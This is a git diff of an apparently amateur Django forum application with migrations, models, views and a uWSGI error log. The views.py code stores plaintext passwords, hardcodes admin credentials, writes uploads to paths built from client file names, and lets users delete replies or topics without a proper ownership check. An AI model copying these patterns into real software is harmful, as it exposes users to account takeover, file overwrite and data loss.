+ field=models.CharField(max_length=3000, null=True, verbose_name='公告内容'),
+ ),
+ migrations.AlterField(
+ model_name='announcement',
+ name='a_title',
+ field=models.CharField(max_length=64, verbose_name='公告标题'),
+ ),
+ ]
diff --git a/master/app01/migrations/0003_auto_20190703_0259.py b/master/app01/migrations/0003_auto_20190703_0259.py
new file mode 100644
index 0000000..9b92948
--- /dev/null
+++ b/master/app01/migrations/0003_auto_20190703_0259.py
@@ -0,0 +1,25 @@
+# Generated by Django 2.1.4 on 2019-07-03 02:59
+
+from django.db import migrations
+
+
+class Migration(migrations.Migration):
+
+ dependencies = [
+ ('app01', '0002_auto_20190703_0151'),
+ ]
+
+ operations = [
+ migrations.RemoveField(
+ model_name='announcement',
+ name='a_id',
+ ),
+ migrations.RemoveField(
+ model_name='kind',
+ name='k_id',
+ ),
+ migrations.RemoveField(
+ model_name='topic',
+ name='t_id',
+ ),
+ ]
diff --git a/master/app01/migrations/0004_topic_t_like.py b/master/app01/migrations/0004_topic_t_like.py
new file mode 100644
index 0000000..e30aea0
--- /dev/null
+++ b/master/app01/migrations/0004_topic_t_like.py
@@ -0,0 +1,18 @@
+# Generated by Django 3.1.5 on 2021-01-13 09:16
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+ dependencies = [
+ ('app01', '0003_auto_20190703_0259'),
+ ]
+
+ operations = [
+ migrations.AddField(
+ model_name='topic',
+ name='t_like',
+ field=models.IntegerField(default=0, verbose_name='点赞数量'),
+ ),
+ ]
diff --git a/master/app01/migrations/__init__.py b/master/app01/migrations/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/master/app01/migrations/__pycache__/0001_initial.cpython-36.pyc b/master/app01/migrations/__pycache__/0001_initial.cpython-36.pyc
new file mode 100644
index 0000000..9e59d84
Binary files /dev/null and b/master/app01/migrations/__pycache__/0001_initial.cpython-36.pyc differ
diff --git a/master/app01/migrations/__pycache__/0001_initial.cpython-37.pyc b/master/app01/migrations/__pycache__/0001_initial.cpython-37.pyc
new file mode 100644
index 0000000..e2d4fbe
Binary files /dev/null and b/master/app01/migrations/__pycache__/0001_initial.cpython-37.pyc differ
diff --git a/master/app01/migrations/__pycache__/0002_auto_20190703_0151.cpython-36.pyc b/master/app01/migrations/__pycache__/0002_auto_20190703_0151.cpython-36.pyc
new file mode 100644
index 0000000..42f4f99
Binary files /dev/null and b/master/app01/migrations/__pycache__/0002_auto_20190703_0151.cpython-36.pyc differ
diff --git a/master/app01/migrations/__pycache__/0002_auto_20190703_0151.cpython-37.pyc b/master/app01/migrations/__pycache__/0002_auto_20190703_0151.cpython-37.pyc
new file mode 100644
index 0000000..f753a6b
Binary files /dev/null and b/master/app01/migrations/__pycache__/0002_auto_20190703_0151.cpython-37.pyc differ
diff --git a/master/app01/migrations/__pycache__/0003_auto_20190703_0259.cpython-36.pyc b/master/app01/migrations/__pycache__/0003_auto_20190703_0259.cpython-36.pyc
new file mode 100644
index 0000000..470ee22
Binary files /dev/null and b/master/app01/migrations/__pycache__/0003_auto_20190703_0259.cpython-36.pyc differ
diff --git a/master/app01/migrations/__pycache__/0003_auto_20190703_0259.cpython-37.pyc b/master/app01/migrations/__pycache__/0003_auto_20190703_0259.cpython-37.pyc
new file mode 100644
index 0000000..4e9866a
Binary files /dev/null and b/master/app01/migrations/__pycache__/0003_auto_20190703_0259.cpython-37.pyc differ
diff --git a/master/app01/migrations/__pycache__/0004_topic_t_like.cpython-36.pyc b/master/app01/migrations/__pycache__/0004_topic_t_like.cpython-36.pyc
new file mode 100644
index 0000000..215b86a
Binary files /dev/null and b/master/app01/migrations/__pycache__/0004_topic_t_like.cpython-36.pyc differ
diff --git a/master/app01/migrations/__pycache__/0004_topic_t_like.cpython-37.pyc b/master/app01/migrations/__pycache__/0004_topic_t_like.cpython-37.pyc
new file mode 100644
index 0000000..ce547c9
Binary files /dev/null and b/master/app01/migrations/__pycache__/0004_topic_t_like.cpython-37.pyc differ
diff --git a/master/app01/migrations/__pycache__/__init__.cpython-36.pyc b/master/app01/migrations/__pycache__/__init__.cpython-36.pyc
new file mode 100644
index 0000000..cfea7d0
Binary files /dev/null and b/master/app01/migrations/__pycache__/__init__.cpython-36.pyc differ
diff --git a/master/app01/migrations/__pycache__/__init__.cpython-37.pyc b/master/app01/migrations/__pycache__/__init__.cpython-37.pyc
new file mode 100644
index 0000000..8d3a7fd
Binary files /dev/null and b/master/app01/migrations/__pycache__/__init__.cpython-37.pyc differ
diff --git a/master/app01/models.py b/master/app01/models.py
new file mode 100644
index 0000000..c668f07
--- /dev/null
+++ b/master/app01/models.py
@@ -0,0 +1,46 @@
+from django.db import models
+
+
+# Create your models here.
+
+# 用户表
+class User(models.Model):
+ uid = models.CharField(verbose_name='电话/用户号', max_length=16, unique=True)
+ password = models.CharField(verbose_name='密码', max_length=16)
+ create_time = models.DateField(verbose_name='创建时间', auto_now_add=True)
+
+
+# 帖子表
+class Topic(models.Model):
+ #t_id = models.CharField(verbose_name='帖子id', max_length=16)
+ t_uid = models.CharField(verbose_name='帖子所属用户id', max_length=16)
+ t_kind = models.CharField(verbose_name='类别', max_length=32)
+ create_time = models.DateField(verbose_name='创建时间', auto_now_add=True)
+ t_photo = models.CharField(verbose_name='帖子图片', max_length=128, null=True)
+ t_content = models.CharField(verbose_name='帖子正文', max_length=3000)
+ t_title = models.CharField(verbose_name='帖子标题', max_length=64)
+ t_introduce = models.CharField(verbose_name='帖子简介', max_length=256)
+ recommend = models.BooleanField(verbose_name='是否推荐', default=False)
+ t_like = models.IntegerField(verbose_name='点赞数量',default=0)
+
+
+# 回复表
+class Reply(models.Model):
+ r_tid = models.CharField(verbose_name='帖子id', max_length=16)
+ r_uid = models.CharField(verbose_name='发表者id', max_length=16)
+ r_photo = models.CharField(verbose_name='回复的图片', max_length=128, null=True)
+ r_time = models.DateField(verbose_name='留言时间', auto_now_add=True)
+ r_content = models.CharField(verbose_name='回复内容', max_length=256)
+
+
+# 分类表
+class Kind(models.Model):
+ # k_id = models.CharField(verbose_name='分类id', max_length=16)
+ k_name = models.CharField(verbose_name='分类名称', max_length=16)
+
+
+# 公告表
+class Announcement(models.Model):
+ # a_id = models.CharField(verbose_name='公告id', max_length=16)
+ a_title = models.CharField(verbose_name='公告标题', max_length=64)
+ a_content = models.CharField(verbose_name='公告内容', max_length=3000, null=True)
diff --git a/master/app01/tests.py b/master/app01/tests.py
new file mode 100644
index 0000000..7ce503c
--- /dev/null
+++ b/master/app01/tests.py
@@ -0,0 +1,3 @@
+from django.test import TestCase
+
+# Create your tests here.
diff --git a/master/app01/views.py b/master/app01/views.py
new file mode 100644
index 0000000..345a952
--- /dev/null
+++ b/master/app01/views.py
@@ -0,0 +1,565 @@
+from django.http import HttpResponse
+from django.shortcuts import render, redirect
+from app01 import models
+import json
+
+
+# Create your views here.
+
+# 主页
+def home(request):
+ if request.method == 'GET':
+ response = {}
+
+ # top 10(公告)的处理,筛选10个也要改
+ announcements = models.Announcement.objects.filter()
+ # 把这10个公告封装成字典
+ a_list = []
+ for a in announcements:
+ dic = {'a_id': a.id, 'a_title': a.a_title}
+ a_list.append(dic)
+ # 把列表装进回复字典里
+ n = 10 if len(a_list) < 10 else len(a_list)
+
+ response['a_list'] = a_list[::-1][0:n-1]
+
+ # 帖子推荐列表,推荐8个帖子,推荐8个要改
+ recommends = models.Topic.objects.filter(recommend=True)
+ # 推荐列表
+ r_list = []
+
+ for t in recommends:
+ dic = {'t_id': t.id, 't_title': t.t_title, 't_introduce': t.t_introduce, 't_photo': t.t_photo}
+ r_list.append(dic)
+ # 把列表装进response
+ response['r_list'] = r_list
+
+ # 把uid装进返回字典里
+ response['uid'] = request.session['uid']
+
+ # 把所有类别装入返回字典里
+ kinds = models.Kind.objects.filter()
+ response['kinds'] = kinds
+
+ return render(request, 'home.html', response)
+
+
+# 所有帖子
+def all_tie(request, kid, reply_limit, time_limit):
+ uid = request.session.get('uid')
+ if request.method == 'GET':
+ kinds = models.Kind.objects.filter()
+ if kid == '0' and reply_limit == '0' and time_limit == '0':
+ # 默认时间排序把帖子传过去
+ topics = models.Topic.objects.filter()
+ else:
+ # request.path_info # 获取当前url
+ # from django.urls import reverse
+ # reverse('all_tie', kwargs={'kid': '0', 'reply_limit': '0', 'time_limit': '0'})
+
+ topics = models.Topic.objects.filter()
+
+ # 筛选分类
+ if kid != '0':
+ topics = models.Topic.objects.filter(t_kind=kid)
+
+ # 筛选回复数量
+ tmp = []
+ for topic in topics:
+ # 查看每个帖子的回复数量
+ count = len(models.Reply.objects.filter(r_tid=topic.id))
+ # print(count)
+ print(reply_limit)
+ if reply_limit == '0':
+ pass
+ elif reply_limit == '1': # 1是大于100
+ print('到1了')
+ if count < 100:
+ print('到了')
+ continue
+ elif reply_limit == '2': # 2是30-100
+ if count < 30 or count > 100:
+ continue
+ elif reply_limit == '3': # 3是小于30
+ if count > 30:
+ continue
+ tmp.append(topic)
+ topics = tmp
+ print(topics)
+
+ # 筛选发布时间
+ tmp = []
+ for topic in topics:
+ if time_limit == '0': # 0是全部时间
+ pass
+ elif time_limit == '1': # 1是1个月内
+ # 如果在限制之前,就筛掉
+ pass
+ elif time_limit == '2': # 2是3个月内
+ # 如果在限制之前,就筛掉
+ pass
+ elif time_limit == '3': # 3是6个月内
+ # 如果在限制之前,就筛掉
+ pass
+ elif time_limit == '4': # 4是1年内
+ # 如果在限制之前,就筛掉
+ pass
+ tmp.append(topic)
+ topics = tmp
+
+ response = {
+ 'topics': topics,
+ 'kinds': kinds,
+ 'kid': kid,
+ 'time_limit': time_limit,
+ 'reply_limit': reply_limit,
+ 'uid': uid,
+ }
+ return render(request, 'all.html', response)
+
+ elif request.method == 'POST':
+ # 搜索接收一个字段,查询标题或者简介里有关键字的帖子
+ keys = request.POST.get('keys')
+ # 按关键字查询标题里含有关键字的
+ topics = models.Topic.objects.filter(t_title__icontains=keys)
+
+ kinds = models.Kind.objects.filter()
+ return render(request, 'all.html', {'topics': topics, 'kinds': kinds, 'uid': uid})
+
+def ownpublish(request, kid, reply_limit, time_limit):
+ uid = request.session.get('uid')
+ if request.method == 'GET':
+ kinds = models.Kind.objects.filter()
+ if kid == '0' and reply_limit == '0' and time_limit == '0':
+ # 默认时间排序把帖子传过去
+ topics = models.Topic.objects.filter(t_uid = uid)
+ else:
+ # request.path_info # 获取当前url
+ # from django.urls import reverse
+ # reverse('all_tie', kwargs={'kid': '0', 'reply_limit': '0', 'time_limit': '0'})
+
+ topics = models.Topic.objects.filter(t_uid = uid)
+
+ # 筛选分类
+ if kid != '0':
+ topics = models.Topic.objects.filter(t_kind=kid,t_uid = uid)
+
+ # 筛选回复数量
+ tmp = []
+ for topic in topics:
+ # 查看每个帖子的回复数量
+ count = len(models.Reply.objects.filter(r_tid=topic.id))
+ # print(count)
+ print(reply_limit)
+ if reply_limit == '0':
+ pass
+ elif reply_limit == '1': # 1是大于100
+ print('到1了')
+ if count < 100:
+ print('到了')
+ continue
+ elif reply_limit == '2': # 2是30-100
+ if count < 30 or count > 100:
+ continue
+ elif reply_limit == '3': # 3是小于30
+ if count > 30:
+ continue
+ tmp.append(topic)
+ topics = tmp
+ print(topics)
+
+ # 筛选发布时间
+ tmp = []
+ for topic in topics:
+ if time_limit == '0': # 0是全部时间
+ pass
+ elif time_limit == '1': # 1是1个月内
+ # 如果在限制之前,就筛掉
+ pass
+ elif time_limit == '2': # 2是3个月内
+ # 如果在限制之前,就筛掉
+ pass
+ elif time_limit == '3': # 3是6个月内
+ # 如果在限制之前,就筛掉
+ pass
+ elif time_limit == '4': # 4是1年内
+ # 如果在限制之前,就筛掉
+ pass
+ tmp.append(topic)
+ topics = tmp
+
+ response = {
+ 'topics': topics,
+ 'kinds': kinds,
+ 'kid': kid,
+ 'time_limit': time_limit,
+ 'reply_limit': reply_limit,
+ 'uid': uid,
+ }
+ return render(request, 'ownpublish.html', response)
+
+ elif request.method == 'POST':
+ type1 = request.POST.get('type1')
+ if type1 == 'owndelete':
+ tid = request.POST.get('tid')
+ # 刪除帖子
+ response = {'msg': '', 'status': False}
+ r_id = request.POST.get('r_id')
+ models.Topic.objects.filter(id=tid).delete()
+ response['status'] = True
+ return HttpResponse(json.dumps(response))
+ else:
+ # 搜索接收一个字段,查询标题或者简介里有关键字的帖子
+ keys = request.POST.get('keys')
+ # 按关键字查询标题里含有关键字的
+ topics = models.Topic.objects.filter(t_title__icontains=keys,t_uid = uid)
+
+ kinds = models.Kind.objects.filter()
+ return render(request, 'ownpublish.html', {'topics': topics, 'kinds': kinds, 'uid': uid})
+
+# 登录
+def login(request):
+ if request.method == 'GET':
+ return render(request, 'login.html')
+ elif request.method == 'POST':
+ # 验证用户名密码是否正确,然后登陆存入session
+ type = request.POST.get('type')
+ response = {'msg': '', 'status': False}
+
+
+ uid = request.POST.get('uid')
+ pwd = request.POST.get('pwd')
+ if type == 'login':
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ # 登录成功
+ response['status'] = True
+ request.session['uid'] = uid
+ return HttpResponse(json.dumps(response))
+ pass
+ else:
+ # 登录失败
+ response['msg'] = '用户名或者密码错误'
+ return HttpResponse(json.dumps(response))
+ pass
+ elif type == 'register':
+ models.User.objects.create(uid=uid, password=pwd)
+ response['status'] = True
+ request.session['uid'] = uid
+ return HttpResponse(json.dumps(response))
+
+
+# 注册
+def register(request):
+ if request.method == 'POST':
+ # 判断是否已有
+ uid = request.POST.get('uid')
+ pwd = request.POST.get('pwd')
+ if len(models.User.objects.filter(uid=uid)) != 0:
+ # 已被创建,返回错误
+ return render(request, 'login.html', {'message': '用户名已被创建'})
+ else:
+ # 插入数据
+ user = {
+ 'uid': uid,
+ 'password': pwd,
+ }
+ models.User.objects.create(**user)
+ return redirect('/home')
+
+
+# 发布页
+def publish(request):
+ if request.method == 'GET':
+ kinds = models.Kind.objects.filter()
+ response = {
+ 'kinds': kinds
+ }
+ return render(request, 'publish.html', response)
+ elif request.method == 'POST':
+ # session获取uid
+ uid = request.session['uid']
+ # 提交发布的文章
+ t_title = request.POST.get('t_title')
+ t_introduce = request.POST.get('t_introduce')
+ t_content = request.POST.get('t_content')
+ t_kind = request.POST.get('t_kind')
+ print(t_title, t_introduce)
+
+ obj = models.Topic.objects.create(t_title=t_title, t_introduce=t_introduce,
+ t_content=t_content, t_kind=t_kind, t_uid=uid)
+ t_id = obj.id
+
+ # 存帖子图片
+ t_photo = request.FILES.get('t_photo', None)
+ #t_photo_path = 'static/img/t_photo/' + str(t_id) + '_' + t_photo.name
+
+ if t_photo:
+ t_photo_path = 'static/img/t_photo/' + str(t_id) + '_' + t_photo.name
+ # 保存文件
+ import os
+ f = open(os.path.join(t_photo_path), 'wb')
+ for line in t_photo.chunks():
+ f.write(line)
+ f.close()
+ else:
+ t_photo_path = 'static/img/t_photo/' + 'wrong.jpg'
+ # 吧图片路径存入数据库
+ models.Topic.objects.filter(id=t_id).update(t_photo='/'+t_photo_path)
+
+ return redirect('/single/' + str(t_id))
+
+
+# 单个帖子页面
+def single(request, tid):
+ if request.method == 'GET':
+ # 帖子内容
+ # 时间类别作者,标题,正文,图片path
+ try:
+ topic = models.Topic.objects.get(id = tid)
+ except Exception as e:
+ return redirect('/home')
+
+ t_time = topic.create_time
+ t_kind = topic.t_kind
+ # 根据类别 id 获得类别名称
+ kind = models.Kind.objects.get(id = t_kind)
+ t_kind = kind.k_name
+ t_title = topic.t_title
+ t_content = topic.t_content
+ t_photo = topic.t_photo
+ t_uid = topic.t_uid
+ t_introduce = topic.t_introduce
+ t_like = topic.t_like
+ uid = request.session['uid']
+ admin_uid = request.session.get('admin_uid')
+
+ response = {
+ 'tid': tid,
+ 't_uid': t_uid,
+ 't_time': t_time,
+ 't_kind': t_kind,
+ 't_title': t_title,
+ 't_content': t_content,
+ 't_photo': t_photo,
+ 't_introduce': t_introduce,
+ 'uid': uid,
+ 'admin_uid': admin_uid,
+ 't_like':t_like
+ }
+
+ # 留言内容
+ # 留言者,留言时间,留言内容
+ replys = models.Reply.objects.filter(r_tid=tid)
+ reply_list = []
+ for reply in replys:
+ single_reply = {
+ 'r_uid': reply.r_uid,
+ 'r_time': reply.r_time,
+ 'r_content': reply.r_content,
+ 'r_id': reply.id,
+ 'r_photo': reply.r_photo,
+ }
+ reply_list.append(single_reply)
+ response['reply_list'] = reply_list
+
+ return render(request, 'single.html', response)
+
+ elif request.method == 'POST':
+ type1 = request.POST.get('type1')
+ if type1 == 'like':
+ print("here")
+ tid = request.POST.get('tid')
+ response = {'msg': '', 'status': False}
+ # 点赞数量增加 1
+ orignal_like = models.Topic.objects.get(id=tid).t_like
+ models.Topic.objects.filter(id=tid).update(t_like=orignal_like + 1)
+ response['status'] = True
+ return HttpResponse(json.dumps(response))
+ # 判断是否登录
+ uid = request.session.get('uid')
+
+ # 删除回复,管理员才可以删除
+ p_type = request.POST.get('type2')
+ if p_type == 'delete':
+ response = {'msg': '', 'status': False}
+ r_id = request.POST.get('r_id')
+ uid = request.POST.get('uid')
+ r_uid = models.Reply.objects.get(id=r_id).r_uid
+ if uid == r_uid:
+ models.Reply.objects.filter(id=r_id).delete()
+ response['status'] = True
+ return HttpResponse(json.dumps(response))
+
+ if not uid:
+ return redirect('/login')
+ # 进行回复
+ r_content = request.POST.get('r_content')
+
+ # 提交数据库
+ obj = models.Reply.objects.create(r_tid=tid,r_uid=uid,r_content=r_content)
+
+ r_id = str(obj.id)
+ r_photo = request.FILES.get('r_photo')
+ if r_photo:
+ # 保存文件
+ r_photo_path = 'static/img/r_photo/' + r_id + '_' + r_photo.name
+ import os
+ f = open(os.path.join(r_photo_path), 'wb')
+ for line in r_photo.chunks():
+ f.write(line)
+ f.close()
+ models.Reply.objects.filter(id=r_id).update(r_photo='/'+r_photo_path)
+ #else:
+ #r_photo_path = 'static/img/t_photo/' + 'hungry.png'
+
+ # 吧图片路径存入数据库
+ #models.Reply.objects.filter(id=r_id).update(r_photo='/'+r_photo_path)
+ return redirect('/single/' + tid)
+
+
+# 修改密码页面
+def edit_pwd(request):
+ if request.method == 'GET':
+ uid = request.session.get('uid')
+ return render(request, 'edit-pwd.html', {'uid': uid})
+
+ if request.method == 'POST':
+ uid = request.session.get('uid')
+ old = request.POST.get('old_pwd')
+ new1 = request.POST.get('new_pwd1')
+ new2 = request.POST.get('new_pwd2')
+ if new1 == new2 and len(models.User.objects.filter(uid=uid, password=old)) != 0:
+ # 核对成功,修改密码
+ models.User.objects.filter(uid=uid).update(password=new1)
+ return redirect('/home')
+
+
+# 管理员登录
+def admin(request):
+ if request.method == 'GET':
+ return render(request, 'admin.html')
+ elif request.method == 'POST':
+ admin_uid = request.POST.get('admin_id')
+ admin_pwd = request.POST.get('admin_pwd')
+
+ response = {'msg': '', 'status': False}
+
+ if admin_uid == 'guanliyuan' and admin_pwd == '123456':
+ # 管理员登录成功
+ response['status'] = True
+ request.session['admin_uid'] = 'guanliyuan'
+ return HttpResponse(json.dumps(response))
+ else:
+ response['msg'] = '用户名或者密码错误'
+ return HttpResponse(json.dumps(response))
+
+
+# 公告管理
+def announcement(request):
+ if not request.session.get('admin_uid'):
+ return redirect('/my-admin')
+
+ # 查询所有公告
+ if request.method == 'GET':
+
+ announcements = models.Announcement.objects.filter()
+ response = {'announcements': announcements}
+ return render(request, 'announcement.html', response)
+
+ # 发公告,删公告
+ elif request.method == 'POST':
+ p_type = request.POST.get('type')
+ response = {'msg': '', 'status': False}
+ if p_type == 'delete':
+ a_id = request.POST.get('a_id')
+ models.Announcement.objects.filter(id=a_id).delete()
+ response['status'] = True
+ elif p_type == 'create':
+ # 添加一条公告
+ a_title = request.POST.get('a_title')
+ a_content = request.POST.get('a_content')
+ models.Announcement.objects.create(a_title=a_title, a_content=a_content)
+ response['status'] = True
+ return HttpResponse(json.dumps(response))
+
+
+# 帖子管理:标题,简介,时间,
+def topic_manage(request):
+ if not request.session.get('admin_uid'):
+ return redirect('/my-admin')
+
+ if request.method == 'GET':
+ topics = models.Topic.objects.filter()
+ response = {
+ 'topics': topics,
+ }
+ return render(request, 'admin-home.html', response)
+ elif request.method == 'POST':
+ p_type = request.POST.get('type')
+ response = {'msg': '', 'status': False}
+ print(p_type)
+ # 删除帖子
+ if p_type == 'delete':
+ t_id = request.POST.get('t_id')
+ models.Topic.objects.filter(id=t_id).delete()
+ response['status'] = True
+ # 置顶(推荐)
+ if p_type == 'zhiding':
+ print('置顶')
+ t_id = request.POST.get('t_id')
+ models.Topic.objects.filter(id=t_id).update(recommend=True)
+ response['status'] = True
+ # 取消置顶(推荐)
+ if p_type == 'qzhiding':
+ t_id = request.POST.get('t_id')
+ models.Topic.objects.filter(id=t_id).update(recommend=False)
+ response['status'] = True
+ return HttpResponse(json.dumps(response))
+
+
+# 类别管理(板块管理)
+def kind_manage(request):
+ # 验证登录
+ if not request.session.get('admin_uid'):
+ return redirect('/my-admin')
+
+ if request.method == 'GET':
+ # get返回所有类别(板块)
+ kinds = models.Kind.objects.filter()
+ response = {
+ 'kinds': kinds,
+ }
+ return render(request, 'kind-manage.html', response)
+ if request.method == 'POST':
+ p_type = request.POST.get('type')
+ response = {'msg': '', 'status': False}
+ # 删除类别
+ if p_type == 'delete':
+ k_id = request.POST.get('k_id')
+ models.Kind.objects.filter(id=k_id).delete()
+ response['status'] = True
+
+ # 添加类别
+ if p_type == 'create':
+ k_name = request.POST.get('k_name')
+ models.Kind.objects.create(k_name=k_name)
+ response['status'] = True
+
+ return HttpResponse(json.dumps(response))
+
+
+# 公告页面
+def single_an(request, aid):
+ if request.method == 'GET':
+ try:
+ an = models.Announcement.objects.get(id=aid)
+ except Exception as e:
+ return '/home'
+ a_title = an.a_title
+ a_content = an.a_content
+
+ response = {
+ 'a_title': a_title,
+ 'a_content': a_content,
+ }
+ return render(request, 'single-an.html', response)
diff --git a/master/logs/error.log b/master/logs/error.log
new file mode 100644
index 0000000..a723128
--- /dev/null
+++ b/master/logs/error.log
@@ -0,0 +1,19588 @@
+*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:09:36 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-13-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /
+detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 7269
+your memory page size is 4096 bytes
+detected max file descriptor number: 1024
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+uWSGI http bound on 0.0.0.0:8080 fd 4
+uwsgi socket 0 bound to TCP address 127.0.0.1:36114 (port auto-assigned) fd 3
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)]
+Python main interpreter initialized at 0x15c8870
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+python threads support enabled
+your server socket listen backlog is limited to 100 connections
+your mercy for graceful operations on workers is 60 seconds
+mapped 166752 bytes (162 KB) for 2 cores
+*** Operational MODE: threaded ***
+ModuleNotFoundError: No module named 'master'
+unable to load app 0 (mountpoint='') (callable not found or import error)
+open("/www/wwwroot/master//__init__.py"): No such file or directory [plugins/python/python_plugin.c line 464]
+unable to load app 0 (mountpoint='') (callable not found or import error)
+*** no app loaded. going in full dynamic mode ***
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+*** uWSGI is running in multiple interpreter mode ***
+spawned uWSGI master process (pid: 13736)
+spawned uWSGI worker 1 (pid: 13737, cores: 2)
+spawned uWSGI http 1 (pid: 13738)
+Fri Jan 8 21:10:14 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:18:42 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-13-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /
+detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 7269
+your memory page size is 4096 bytes
+detected max file descriptor number: 1024
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+uWSGI http bound on 0.0.0.0:8080 fd 4
+uwsgi socket 0 bound to TCP address 127.0.0.1:46350 (port auto-assigned) fd 3
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)]
+Python main interpreter initialized at 0x21259c0
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+python threads support enabled
+your server socket listen backlog is limited to 100 connections
+your mercy for graceful operations on workers is 60 seconds
+mapped 166752 bytes (162 KB) for 2 cores
+*** Operational MODE: threaded ***
+ModuleNotFoundError: No module named 'master'
+unable to load app 0 (mountpoint='') (callable not found or import error)
+WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x21259c0 pid: 15209 (default app)
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+*** uWSGI is running in multiple interpreter mode ***
+spawned uWSGI master process (pid: 15209)
+spawned uWSGI worker 1 (pid: 15210, cores: 2)
+spawned uWSGI http 1 (pid: 15211)
+Not Found: /
+[pid: 15210|app: 0|req: 1/1] 117.100.100.38 () {38 vars in 1206 bytes} [Fri Jan 8 13:19:09 2021] GET / => generated 3244 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 15210|app: 0|req: 2/2] 117.100.100.38 () {38 vars in 1156 bytes} [Fri Jan 8 13:19:09 2021] GET /favicon.ico => generated 3295 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 15210|app: 0|req: 3/3] 117.100.100.38 () {38 vars in 1214 bytes} [Fri Jan 8 13:19:15 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 15210|app: 0|req: 4/4] 117.100.100.38 () {38 vars in 1216 bytes} [Fri Jan 8 13:19:15 2021] GET /home/ => generated 61812 bytes in 51 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1)
+[pid: 15210|app: 0|req: 5/5] 117.100.100.38 () {38 vars in 1216 bytes} [Fri Jan 8 13:19:44 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0)
+[pid: 15210|app: 0|req: 6/6] 117.100.100.38 () {38 vars in 1218 bytes} [Fri Jan 8 13:19:45 2021] GET /login/ => generated 6356 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 15210|app: -1|req: -1/7] 117.100.100.38 () {38 vars in 1265 bytes} [Fri Jan 8 13:19:45 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15210|app: -1|req: -1/8] 117.100.100.38 () {38 vars in 1243 bytes} [Fri Jan 8 13:19:45 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 15210|app: -1|req: -1/9] 117.100.100.38 () {38 vars in 1245 bytes} [Fri Jan 8 13:19:45 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 15210|app: -1|req: -1/10] 117.100.100.38 () {38 vars in 1251 bytes} [Fri Jan 8 13:19:45 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15210|app: -1|req: -1/11] 117.100.100.38 () {38 vars in 1247 bytes} [Fri Jan 8 13:19:45 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
